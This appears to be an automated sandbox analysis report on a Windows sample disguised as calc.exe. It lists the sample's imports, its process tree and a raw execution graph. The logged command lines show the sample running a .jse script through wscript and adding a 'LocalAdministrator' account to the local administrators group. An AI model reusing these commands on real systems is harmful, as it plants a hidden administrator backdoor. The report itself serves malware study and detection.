ole32.dllCreateStreamOnHGlobal, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoInitialize, CoUninitialize, CoCreateInstance, CoTaskMemAlloc, CoTaskMemFree, IIDFromString, StringFromIID, CLSIDFromString, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, StringFromCLSID, OleUninitialize
OLEAUT32.dllLoadRegTypeLib, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SysAllocString, SafeArrayUnaccessData, SafeArrayAccessData, VarR4FromDec, VariantTimeToSystemTime, VariantClear, VariantCopy, VariantInit, OleLoadPicture, GetActiveObject
SHELL32.dllSHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, Shell_NotifyIconW, ExtractIconExW, DragFinish, DragQueryFileW, DragQueryPoint, ShellExecuteW, ShellExecuteExW
USER32.dllUnregisterHotKey, PeekMessageW, TranslateMessage, DispatchMessageW, GetMessageW, CharLowerBuffW, CharUpperW, OpenClipboard, IsClipboardFormatAvailable, GetClipboardData, CloseClipboard, CountClipboardFormats, EmptyClipboard, SetClipboardData, GetCursor, RegisterHotKey, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, FlashWindow, GetWindowTextLengthW, SetMenuDefaultItem, SetMenu, CreateMenu, DeleteMenu, DestroyMenu, DrawMenuBar, SetMenuItemInfoW, GetDC, SetWindowPos, SetWindowLongW, RedrawWindow, wsprintfW, CharNextW, IsMenu, GetActiveWindow, LockWindowUpdate, CreateIconFromResourceEx, DestroyWindow, SetClassLongW, AdjustWindowRectEx, SetRect, SystemParametersInfoW, GetSystemMetrics, ReleaseDC, GetWindowDC, SetCursor, MessageBeep, VkKeyScanA, FillRect, SubtractRect, FrameRect, DrawTextW, DrawFocusRect, InflateRect, GetSysColor, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, GetMenuItemInfoW, SetWindowTextW, ReleaseCapture, SetCapture, ClientToScreen, GetKeyState, WindowFromPoint, GetClientRect, TrackPopupMenuEx, GetCursorPos, IsDialogMessageW, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, ScreenToClient, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, SendMessageTimeoutW, GetFocus, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, CreateIcon, SetForegroundWindow, IsIconic, FindWindowW, SetKeyboardState, GetKeyboardState, LoadImageW, keybd_event, GetWindowTextW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, GetKeyboardLayoutNameA, MessageBoxW, LoadStringW, DialogBoxParamW, EndDialog, SendDlgItemMessageW, GetMenu, CopyRect, IsChild, GetWindow, GetNextDlgTabItem, GetClassWord, GetDlgItem, PtInRect, OffsetRect, LoadCursorW, GetSysColorBrush, GetForegroundWindow, DestroyIcon, EndPaint, BeginPaint, InsertMenuItemW, DrawFrameControl, CopyImage, GetAsyncKeyState
VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
WINMM.dllwaveOutSetVolume, timeGetTime, mciSendStringW
WSOCK32.dll__WSAFDIsSet, recv, send, socket, connect, closesocket, bind, select, accept, htons, sendto, recvfrom, ntohs, WSAGetLastError, ioctlsocket, WSACleanup, inet_addr, gethostbyname, WSAStartup, gethostname, listen

Possible Origin

Language of compilation systemCountry where language is spokenMap
EnglishGreat Britain

Network Behavior

No network behavior found

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

General

Target ID:0
Start time:00:21:26
Start date:02/10/2024
Path:C:\Users\user\Desktop\calc.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\calc.exe"
Imagebase:0x400000
File size:432'169 bytes
MD5 hash:4BF28F0B6A5B20681A1378A0D8AFE694
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

General

Target ID:1
Start time:00:21:27
Start date:02/10/2024
Path:C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\wscript.exe" JzM4PpnOtP.jse
Imagebase:0x890000
File size:147'456 bytes
MD5 hash:FF00E0480075B095948000BDC66E81F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

General

Target ID:2
Start time:00:21:27
Start date:02/10/2024
Path:C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\net.exe" user LocalAdministrator /add
Imagebase:0xc90000
File size:47'104 bytes
MD5 hash:31890A7DE89936F922D44D677F681A7F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

General

Target ID:3
Start time:00:21:27
Start date:02/10/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

General

Target ID:4
Start time:00:21:27
Start date:02/10/2024
Path:C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Imagebase:0xc90000
File size:47'104 bytes
MD5 hash:31890A7DE89936F922D44D677F681A7F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

General

Target ID:5
Start time:00:21:27
Start date:02/10/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

General

Target ID:6
Start time:00:21:27
Start date:02/10/2024
Path:C:\Users\user\Desktop\calc.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\calc.exe"
Imagebase:0x400000
File size:432'169 bytes
MD5 hash:4BF28F0B6A5B20681A1378A0D8AFE694
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

General

Target ID:7
Start time:00:21:27
Start date:02/10/2024
Path:C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\net1 user LocalAdministrator /add
Imagebase:0xfb0000
File size:139'776 bytes
MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

General

Target ID:8
Start time:00:21:27
Start date:02/10/2024
Path:C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Imagebase:0xfb0000
File size:139'776 bytes
MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Disassembly

Reset < >

    Execution Graph

    Execution Coverage:4.8%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:11.1%
    Total number of Nodes:1820
    Total number of Limit Nodes:25
    execution_graph 48277 401641 48280 40165b 48277->48280 48281 40166e 48280->48281 48282 40180f 73A246C0 48281->48282 48283 401782 48281->48283 48284 40167f 48281->48284 48296 401657 48282->48296 48287 4017fb 48283->48287 48288 40178b 48283->48288 48285 401685 48284->48285 48286 40174c 48284->48286 48290 401711 SetTimer RegisterClipboardFormatW 48285->48290 48291 40168e 48285->48291 48289 42a895 4 API calls 48286->48289 48357 4126bc 48 API calls 48287->48357 48292 4017eb 48288->48292 48293 40178f 48288->48293 48297 401777 48289->48297 48295 40173c CreatePopupMenu 48290->48295 48290->48296 48298 401691 48291->48298 48299 4016f2 KillTimer 48291->48299 48356 4125ea 41 API calls 48292->48356 48301 4017d3 48293->48301 48302 401796 48293->48302 48295->48296 48331 42026c 48297->48331 48305 4016d1 MoveWindow 48298->48305 48306 401696 48298->48306 48330 412dd7 Shell_NotifyIconW 48299->48330 48301->48282 48355 401825 36 API calls 48301->48355 48308 4017c1 48302->48308 48309 40179d 48302->48309 48303 40180b 48303->48282 48303->48296 48305->48296 48314 4016c0 SetFocus 48306->48314 48315 40169a 48306->48315 48307 4017f9 48307->48296 48354 412e32 55 API calls 48308->48354 48309->48282 48352 412dd7 Shell_NotifyIconW 48309->48352 48311 401705 PostQuitMessage 48311->48296 48313 40177d 48313->48282 48314->48296 48315->48309 48317 4016a3 48315->48317 48322 42a895 48317->48322 48320 4017ba 48353 4128c6 71 API calls 48320->48353 48323 42a8e2 48322->48323 48324 42a8a6 48322->48324 48323->48296 48358 42fcc3 LoadLibraryA GetProcAddress 48324->48358 48326 42a8bd 48327 42a8c4 Sleep 48326->48327 48328 42a8d4 48326->48328 48327->48326 48328->48323 48329 42a8d9 FreeLibrary 48328->48329 48329->48323 48330->48311 48359 4323fe 48331->48359 48339 4202d3 CharUpperBuffW 48374 418048 40 API calls 48339->48374 48341 4202f4 48342 418a14 VariantClear 48341->48342 48343 42030b 48342->48343 48344 416bfe 36 API calls 48343->48344 48345 420318 CharUpperBuffW 48344->48345 48375 418048 40 API calls 48345->48375 48347 420333 48376 421406 48347->48376 48351 420367 48351->48313 48352->48320 48353->48313 48354->48296 48355->48313 48356->48307 48357->48303 48358->48326 48360 416bfe 36 API calls 48359->48360 48361 43240f 48360->48361 48413 413afa 48361->48413 48363 420296 48363->48351 48364 416d00 48363->48364 48416 416f5d 48364->48416 48366 416d0d 48367 418a14 48366->48367 48368 4183f6 ctype VariantClear 48367->48368 48369 418a1b 48368->48369 48370 416bfe 48369->48370 48371 416c07 48370->48371 48372 449170 36 API calls 48371->48372 48373 416c16 48372->48373 48373->48339 48374->48341 48375->48347 48474 4181c7 48376->48474 48378 421424 48379 4181c7 39 API calls 48378->48379 48380 421436 48379->48380 48500 416c4c 48380->48500 48382 42146b 48383 4181c7 39 API calls 48382->48383 48384 4214ad 48383->48384 48385 4214c8 48384->48385 48526 416a9f 48384->48526 48503 4200f5 48385->48503 48390 4214f2 48533 418874 48390->48533 48391 4214e2 48391->48390 48532 421751 VariantClear 48391->48532 48394 4214fe 48395 418874 40 API calls 48394->48395 48396 42150a 48395->48396 48561 4034ed 36 API calls 48396->48561 48398 42151e 48562 416cee 36 API calls 48398->48562 48400 421535 48401 421574 48400->48401 48402 418874 40 API calls 48400->48402 48403 4183f6 ctype VariantClear 48401->48403 48402->48401 48404 42157c 48403->48404 48405 4183f6 ctype VariantClear 48404->48405 48406 42158d 48405->48406 48407 4183f6 ctype VariantClear 48406->48407 48408 42035d 48407->48408 48409 4183f6 48408->48409 48410 418401 ctype 48409->48410 48411 418416 ctype 48410->48411 48412 41840f VariantClear 48410->48412 48411->48351 48412->48411 48414 413b19 CharUpperBuffW 48413->48414 48415 413b0a 48413->48415 48414->48415 48415->48363 48417 416f6a 48416->48417 48420 416cb6 48417->48420 48419 416f75 48419->48366 48421 416cd3 48420->48421 48422 416cbe 48420->48422 48421->48419 48424 449170 48422->48424 48427 449ab3 48424->48427 48428 44917b 48427->48428 48430 449aba __getbuf 48427->48430 48428->48421 48430->48428 48431 449a38 48430->48431 48432 449a44 __lock 48431->48432 48440 449a77 48432->48440 48441 44c6db 48432->48441 48433 449a92 RtlAllocateHeap 48435 449aa1 __lock 48433->48435 48435->48430 48436 449a5f 48448 44e8f5 5 API calls __getbuf 48436->48448 48438 449a6a 48449 449aaa RtlLeaveCriticalSection __lock 48438->48449 48440->48433 48440->48435 48442 44c701 RtlEnterCriticalSection 48441->48442 48443 44c6ee 48441->48443 48442->48436 48450 44c63b 48443->48450 48445 44c6f4 48445->48442 48473 44be4f 36 API calls _fast_error_exit 48445->48473 48447 44c700 48447->48442 48448->48438 48449->48440 48451 44c647 __lock 48450->48451 48452 449adf __getbuf 36 API calls 48451->48452 48456 44c66a __lock 48451->48456 48453 44c65e 48452->48453 48454 44c665 48453->48454 48455 44c672 48453->48455 48457 44d915 __umatherr 36 API calls 48454->48457 48458 44c6db __lock 36 API calls 48455->48458 48456->48445 48457->48456 48459 44c679 48458->48459 48460 44c681 48459->48460 48461 44c6b9 48459->48461 48463 454432 __lock GetModuleHandleA GetProcAddress 48460->48463 48462 449c88 ___free_lc_time 36 API calls 48461->48462 48464 44c6bf 48462->48464 48465 44c68c 48463->48465 48468 44c6d2 __lock RtlLeaveCriticalSection 48464->48468 48466 44c6b5 48465->48466 48467 44c692 48465->48467 48466->48464 48469 449c88 ___free_lc_time 36 API calls 48467->48469 48468->48456 48470 44c698 48469->48470 48471 44d915 __umatherr 36 API calls 48470->48471 48472 44c69d __lock 48471->48472 48472->48456 48473->48447 48475 4181e2 48474->48475 48499 4181ff 48474->48499 48476 418270 48475->48476 48477 4182b5 48475->48477 48478 4182d5 48475->48478 48479 4181e9 48475->48479 48480 41822c 48475->48480 48475->48499 48486 449170 36 API calls 48476->48486 48476->48499 48483 449170 36 API calls 48477->48483 48482 449170 36 API calls 48478->48482 48481 449170 36 API calls 48479->48481 48484 449170 36 API calls 48480->48484 48485 4181f0 48481->48485 48487 4182dc 48482->48487 48488 4182bc 48483->48488 48484->48499 48495 416c4c 36 API calls 48485->48495 48485->48499 48489 41827f VariantInit VariantCopy 48486->48489 48490 4182ed 48487->48490 48491 41830e 48487->48491 48492 4182c8 48488->48492 48563 41817f 36 API calls 48488->48563 48496 41829b VariantClear 48489->48496 48489->48499 48497 449170 36 API calls 48490->48497 48498 449170 36 API calls 48491->48498 48564 4174f2 36 API calls 48492->48564 48495->48499 48496->48499 48497->48499 48498->48499 48499->48378 48501 449170 36 API calls 48500->48501 48502 416c5e 48501->48502 48502->48382 48504 42012a 48503->48504 48505 42010d 48503->48505 48508 4323fe 37 API calls 48504->48508 48521 420165 48504->48521 48621 41faee 53 API calls _fast_error_exit 48505->48621 48507 420122 48507->48391 48531 416bba VariantClear 48507->48531 48509 420153 48508->48509 48510 421406 335 API calls 48509->48510 48509->48521 48510->48521 48511 4201d8 48511->48507 48513 42a895 4 API calls 48511->48513 48515 42020e 48513->48515 48514 4201da 48516 418a14 VariantClear 48514->48516 48616 406ad8 48515->48616 48516->48511 48519 420218 48519->48507 48520 42026c 335 API calls 48519->48520 48522 420227 LockWindowUpdate KiUserCallbackDispatcher 48520->48522 48521->48511 48521->48514 48565 42003a 48521->48565 48574 42036e 48521->48574 48596 4320d3 48521->48596 48523 420256 GetMessageW 48522->48523 48523->48507 48525 420242 TranslateMessage DispatchMessageW 48523->48525 48525->48523 49416 416b91 48526->49416 48530 416ac1 48530->48385 48531->48391 48532->48391 48534 418881 48533->48534 48560 4188a0 48533->48560 48535 4183f6 ctype VariantClear 48534->48535 48536 418888 48535->48536 48537 4188c1 48536->48537 48538 4188e3 48536->48538 48539 418992 48536->48539 48540 41896e 48536->48540 48542 418927 48536->48542 48536->48560 48541 449170 36 API calls 48537->48541 48544 449170 36 API calls 48538->48544 48543 449170 36 API calls 48539->48543 48545 449170 36 API calls 48540->48545 48546 4188c8 48541->48546 48547 449170 36 API calls 48542->48547 48542->48560 48548 418999 48543->48548 48544->48560 48549 418975 48545->48549 48554 416c4c 36 API calls 48546->48554 48546->48560 48550 418937 VariantInit VariantCopy 48547->48550 48551 4189cb 48548->48551 48552 4189aa 48548->48552 48553 418981 48549->48553 49428 41817f 36 API calls 48549->49428 48555 418953 VariantClear 48550->48555 48550->48560 48557 449170 36 API calls 48551->48557 48556 449170 36 API calls 48552->48556 49429 4174f2 36 API calls 48553->49429 48554->48560 48555->48560 48556->48560 48557->48560 48560->48394 48561->48398 48562->48400 48563->48492 48564->48499 48566 420056 PeekMessageW 48565->48566 48567 420049 48565->48567 48569 42006e 48566->48569 48571 4200af 48566->48571 48567->48566 48568 420052 48567->48568 48568->48521 48569->48571 48572 420087 TranslateMessage DispatchMessageW 48569->48572 48573 42009b PeekMessageW 48569->48573 48622 4042c8 GetClassNameW IsDialogMessageW 48569->48622 48571->48521 48572->48573 48573->48569 48573->48571 48623 4209de 48574->48623 48577 420415 48577->48521 48578 42038e Sleep 48578->48577 48580 42039f 48580->48577 48632 420acc 340 API calls ctype 48580->48632 48582 4203aa 48582->48577 48583 4203ae 48582->48583 48633 420d89 340 API calls ctype 48583->48633 48585 4203b4 48585->48577 48634 420c75 340 API calls ctype 48585->48634 48587 4203bd 48587->48577 48588 42040a 48587->48588 48589 4203ca GetExitCodeProcess 48587->48589 48635 43857c 115 API calls 48588->48635 48589->48578 48590 4203e5 CloseHandle 48589->48590 48593 418a14 VariantClear 48590->48593 48592 420411 48592->48577 48636 43efe7 106 API calls 48592->48636 48594 4203fb 48593->48594 48594->48577 48597 4320fc 48596->48597 48598 4321d1 48597->48598 48599 432107 48597->48599 48756 433470 48598->48756 48600 432199 48599->48600 48601 43210e 48599->48601 48745 4321ef 48600->48745 48604 432113 48601->48604 48605 43218c 48601->48605 48606 432197 48604->48606 48609 43217c 48604->48609 48612 43211d 48604->48612 48688 432d09 48605->48688 48608 4183f6 ctype VariantClear 48606->48608 48610 4321e8 48608->48610 48638 43244b 48609->48638 48610->48521 48613 432122 48612->48613 48811 433276 48612->48811 48613->48606 48840 41faee 53 API calls _fast_error_exit 48613->48840 48620 406aec 48616->48620 48618 406b20 48618->48519 48619 406af9 73A25CF0 48619->48620 48620->48618 49415 40c431 InvalidateRect 48620->49415 48621->48507 48622->48569 48624 4209f6 48623->48624 48630 42037c 48623->48630 48625 4323fe 37 API calls 48624->48625 48624->48630 48626 420a81 48625->48626 48637 416cee 36 API calls 48626->48637 48628 420a9d 48629 421406 340 API calls 48628->48629 48629->48630 48630->48577 48630->48578 48631 42093f 340 API calls 48630->48631 48631->48580 48632->48582 48633->48585 48634->48587 48635->48592 48636->48577 48637->48628 48639 432465 48638->48639 48640 4323fe 37 API calls 48639->48640 48641 43247f 48640->48641 48642 432483 48641->48642 48649 432496 48641->48649 48854 432c28 238 API calls 2 library calls 48642->48854 48644 432491 48644->48613 48646 432864 48648 4183f6 ctype VariantClear 48646->48648 48647 43256f 48841 421630 48647->48841 48650 432bf1 48648->48650 48649->48647 48651 421630 36 API calls 48649->48651 48686 432541 48649->48686 48652 4183f6 ctype VariantClear 48650->48652 48651->48649 48654 432bf9 48652->48654 48655 4183f6 ctype VariantClear 48654->48655 48658 432c01 48655->48658 48656 4327e5 48657 416a9f 37 API calls 48656->48657 48656->48686 48687 4328b7 48657->48687 48914 417c63 VariantClear ctype 48658->48914 48659 432aeb 48849 421713 48659->48849 48664 418a14 VariantClear 48666 432b1e 48664->48666 48667 421406 340 API calls 48666->48667 48668 432b44 48667->48668 48669 432b56 48668->48669 48672 418874 40 API calls 48668->48672 48673 418a14 VariantClear 48669->48673 48670 416990 41 API calls 48670->48687 48671 416bfe 36 API calls 48678 432587 48671->48678 48672->48669 48675 432b81 48673->48675 48912 421751 VariantClear 48675->48912 48676 421630 36 API calls 48676->48687 48677 416bfe 36 API calls 48677->48687 48678->48646 48678->48656 48678->48671 48678->48686 48855 4169e0 CharUpperBuffW 48678->48855 48857 436aed 225 API calls ctype 48678->48857 48858 4190e4 VariantClear ctype 48678->48858 48859 4376b3 48678->48859 48902 417c83 48678->48902 48681 432bd1 48913 416bba VariantClear 48681->48913 48682 4376b3 225 API calls 48682->48687 48910 41faee 53 API calls _fast_error_exit 48686->48910 48687->48659 48687->48670 48687->48676 48687->48677 48687->48682 48687->48686 48911 416a56 37 API calls 48687->48911 48696 432d36 48688->48696 48689 432df6 48692 416bfe 36 API calls 48689->48692 48691 4376b3 225 API calls 48695 432dc2 48691->48695 48694 432e0c 48692->48694 48693 4183f6 ctype VariantClear 48697 4330d7 48693->48697 48698 416c4c 36 API calls 48694->48698 48695->48689 48700 432da5 48695->48700 48727 432df1 48695->48727 48696->48689 48696->48691 48696->48700 48697->48606 48699 432e1f 48698->48699 48701 4169e0 CharUpperBuffW 48699->48701 48943 41faee 53 API calls _fast_error_exit 48700->48943 48702 432e2c 48701->48702 48703 432e39 48702->48703 48708 432f0c 48702->48708 48704 432ef3 48703->48704 48706 432e60 48703->48706 48704->48727 48952 41faee 53 API calls _fast_error_exit 48704->48952 48705 432f5e 48707 432f75 48705->48707 48721 432fa6 48705->48721 48705->48727 48709 416c4c 36 API calls 48706->48709 48951 4309c0 97 API calls ctype 48707->48951 48708->48704 48708->48705 48949 418357 39 API calls 48708->48949 48713 432e7b 48709->48713 48944 416990 CharUpperBuffW 48713->48944 48714 432eb1 48718 4330bb 48714->48718 48719 432ebf 48714->48719 48715 432f4e 48950 436aed 225 API calls ctype 48715->48950 48716 432fcc 48723 433276 225 API calls 48716->48723 48726 418874 40 API calls 48718->48726 48724 432ec8 48719->48724 48725 4330af 48719->48725 48721->48716 48744 432ff8 48721->48744 48722 432e8a 48728 416c4c 36 API calls 48722->48728 48723->48704 48729 4330a3 48724->48729 48730 432ecf 48724->48730 48956 4190fd 64 API calls ctype 48725->48956 48726->48727 48727->48693 48732 432e9c 48728->48732 48955 41924b 62 API calls ctype 48729->48955 48734 433096 48730->48734 48735 432ed6 48730->48735 48736 4169e0 CharUpperBuffW 48732->48736 48954 4193d3 62 API calls ctype 48734->48954 48737 43308a 48735->48737 48738 432edd 48735->48738 48740 432ea9 48736->48740 48953 419319 62 API calls ctype 48737->48953 48738->48727 48948 419bfa 53 API calls 48738->48948 48741 4183f6 ctype VariantClear 48740->48741 48741->48714 48744->48704 48744->48714 48746 4321ff 48745->48746 48958 432285 225 API calls ctype 48746->48958 48748 432233 48749 432266 48748->48749 48751 432250 48748->48751 48755 43225e 48748->48755 48970 41faee 53 API calls _fast_error_exit 48749->48970 48959 420425 48751->48959 48971 417c63 VariantClear ctype 48755->48971 48757 433488 48756->48757 48758 433653 48757->48758 48759 433501 48757->48759 48760 433647 48757->48760 48761 433546 48757->48761 48762 433586 48757->48762 48763 4335c6 48757->48763 48764 4334cc 48757->48764 48765 433513 48757->48765 48766 433557 48757->48766 48767 433597 48757->48767 48768 43349d 48757->48768 48769 4334dd 48757->48769 48770 4335a6 48757->48770 48771 433524 48757->48771 48772 433568 48757->48772 48773 4334af 48757->48773 48774 4334ef 48757->48774 48775 4335ed 48757->48775 48776 433577 48757->48776 48777 4335b7 48757->48777 48778 433536 48757->48778 48779 4335f9 48757->48779 48780 4334bd 48757->48780 48781 43363c 48757->48781 48789 4335d5 48757->48789 48794 4334aa 48757->48794 48795 43360b 48757->48795 49334 41faee 53 API calls _fast_error_exit 48758->49334 49317 433d51 225 API calls ctype 48759->49317 49333 434e42 54 API calls 48760->49333 49321 434533 134 API calls ctype 48761->49321 49325 43498c 225 API calls ctype 48762->49325 49329 4354f2 226 API calls ctype 48763->49329 49314 433adf 225 API calls ctype 48764->49314 49318 433e53 57 API calls ctype 48765->49318 49322 4346d6 225 API calls ctype 48766->49322 49326 43494a 54 API calls 48767->49326 49258 433700 48768->49258 49315 433c00 54 API calls 48769->49315 49327 434c69 57 API calls ctype 48770->49327 49319 433f4d 225 API calls 48771->49319 49323 4348cf 40 API calls ctype 48772->49323 49312 433a8f 40 API calls ctype 48773->49312 49316 433c52 225 API calls ctype 48774->49316 49330 435a47 225 API calls ctype 48775->49330 49324 43494a 54 API calls 48776->49324 49328 4360be 226 API calls ctype 48777->49328 49320 433fc1 230 API calls ctype 48778->49320 49331 4359d0 225 API calls 48779->49331 49313 43494a 54 API calls 48780->49313 49332 434da0 225 API calls 48781->49332 49281 434e89 48789->49281 48794->48606 48810 4323fe 37 API calls 48795->48810 48810->48794 48812 433289 48811->48812 48813 418874 40 API calls 48812->48813 48836 4332bb 48813->48836 48816 4333dc 48820 4183f6 ctype VariantClear 48816->48820 48817 433408 48819 4376b3 225 API calls 48817->48819 48825 433418 48819->48825 48821 4333e7 48820->48821 48822 4183f6 ctype VariantClear 48821->48822 48823 4333ef 48822->48823 48824 4183f6 ctype VariantClear 48823->48824 48826 4333f7 48824->48826 48825->48816 48827 433445 48825->48827 48828 43342d 48825->48828 49380 417c63 VariantClear ctype 48826->49380 48829 417c83 40 API calls 48827->48829 49381 41faee 53 API calls _fast_error_exit 48828->49381 48831 433451 48829->48831 49371 431dce 48831->49371 48835 418874 40 API calls 48835->48836 48836->48816 48836->48817 48836->48835 48837 418a14 VariantClear 48836->48837 48838 4333cd 48836->48838 49365 431e29 48836->49365 49377 417d32 VariantClear ctype 48836->49377 49378 431e5b 225 API calls ctype 48836->49378 48837->48836 49379 41fcd4 53 API calls _fast_error_exit 48838->49379 48840->48606 48842 42163c 48841->48842 48848 42165e 48841->48848 48844 449170 36 API calls 48842->48844 48843 449170 36 API calls 48845 42168a 48843->48845 48844->48848 48915 417e35 48845->48915 48847 4216b6 48847->48678 48848->48843 48850 449170 36 API calls 48849->48850 48851 42171b 48850->48851 48919 421847 48851->48919 48854->48644 48856 4169fb 48855->48856 48856->48678 48857->48678 48858->48678 48924 43633e 48859->48924 48861 43633e 36 API calls 48888 437702 48861->48888 48862 4321ef 225 API calls 48862->48888 48864 437eff 96 API calls 48864->48888 48865 43789d 48942 4384ea VariantClear ctype 48865->48942 48866 437deb 48869 437e23 48866->48869 48870 437cb3 48866->48870 48868 437d29 48874 4181c7 39 API calls 48868->48874 48875 418874 40 API calls 48869->48875 48939 41faee 53 API calls _fast_error_exit 48870->48939 48871 437c86 48931 41faee 53 API calls _fast_error_exit 48871->48931 48872 43850c 40 API calls 48872->48888 48890 437d34 48874->48890 48876 437e01 48875->48876 48940 4384ea VariantClear ctype 48876->48940 48877 437e32 48941 41faee 53 API calls _fast_error_exit 48877->48941 48887 437e49 48891 4183f6 ctype VariantClear 48887->48891 48888->48861 48888->48862 48888->48864 48888->48865 48888->48866 48888->48868 48888->48870 48888->48871 48888->48872 48888->48877 48927 43671d 225 API calls ctype 48888->48927 48928 4174a6 36 API calls 48888->48928 48929 4190b2 37 API calls ctype 48888->48929 48930 419099 VariantClear ctype 48888->48930 48890->48877 48893 437d98 48890->48893 48894 437d6a 48890->48894 48891->48865 48896 4183f6 ctype VariantClear 48893->48896 48932 438541 VariantClear ctype 48894->48932 48898 437da8 48896->48898 48897 437d75 48933 419099 VariantClear ctype 48897->48933 48898->48678 48900 437d89 48934 43850c 48900->48934 48903 417c8e 48902->48903 48909 417cb1 48902->48909 48905 449170 36 API calls 48903->48905 48904 449170 36 API calls 48906 417cde 48904->48906 48905->48909 48907 418874 40 API calls 48906->48907 48908 417d12 48907->48908 48908->48678 48909->48904 48910->48646 48911->48687 48912->48681 48913->48646 48916 417e3d 48915->48916 48918 417e89 48915->48918 48917 449170 36 API calls 48916->48917 48916->48918 48917->48918 48918->48847 48920 418874 40 API calls 48919->48920 48921 42186d 48920->48921 48922 418874 40 API calls 48921->48922 48923 421742 48922->48923 48923->48664 48925 449170 36 API calls 48924->48925 48926 436345 48925->48926 48926->48888 48927->48888 48928->48888 48929->48888 48930->48888 48931->48865 48932->48897 48933->48900 48935 449170 36 API calls 48934->48935 48936 438514 48935->48936 48937 418874 40 API calls 48936->48937 48938 438532 48937->48938 48938->48893 48939->48876 48941->48887 48943->48727 48945 4169a8 48944->48945 48947 4169d1 48945->48947 48957 418048 40 API calls 48945->48957 48947->48722 48948->48727 48949->48715 48950->48705 48951->48704 48952->48727 48953->48727 48954->48727 48955->48727 48956->48727 48957->48947 48958->48748 48960 418a14 VariantClear 48959->48960 48961 420432 48960->48961 48962 42047f 48961->48962 48963 420462 48961->48963 48972 439814 48962->48972 49067 414e55 GetFileAttributesW 48962->49067 49069 4253c3 48962->49069 49096 4222a2 48962->49096 49135 418ad9 48963->49135 48964 42047b 48964->48755 48970->48755 48973 439ac7 48972->48973 49142 4184c9 48973->49142 48976 416c4c 36 API calls 48977 439ae1 48976->48977 48978 4184c9 52 API calls 48977->48978 48979 439af7 48978->48979 48980 416c4c 36 API calls 48979->48980 48981 439b01 48980->48981 49146 416bde 48981->49146 48984 439b21 49160 41faee 53 API calls _fast_error_exit 48984->49160 48985 439b35 CharLowerBuffW 49149 417171 48985->49149 48989 439d5d 48994 439da5 48989->48994 48995 439d89 48989->48995 48990 416bde 36 API calls 48991 439b74 48990->48991 49161 416f90 36 API calls 48991->49161 49165 41858e 48994->49165 49156 4184a9 48995->49156 48996 4184c9 52 API calls 49015 439bb9 48996->49015 48997 439b89 49002 416bfe 36 API calls 48997->49002 48998 416bfe 36 API calls 48998->49015 49011 439ba0 49002->49011 49004 439dd9 49005 439e0a 49004->49005 49012 41858e 56 API calls 49004->49012 49007 418a14 VariantClear 49005->49007 49006 439e1c 49013 439e35 49006->49013 49014 439e59 49006->49014 49044 439b2d 49007->49044 49008 439db8 49008->49004 49010 41858e 56 API calls 49008->49010 49010->49004 49011->49015 49021 416bfe 36 API calls 49011->49021 49016 439df1 49012->49016 49170 4168a2 49013->49170 49022 41858e 56 API calls 49014->49022 49015->48989 49015->48996 49015->48998 49020 439d6b 49015->49020 49162 416f37 36 API calls 49015->49162 49163 416cee 36 API calls 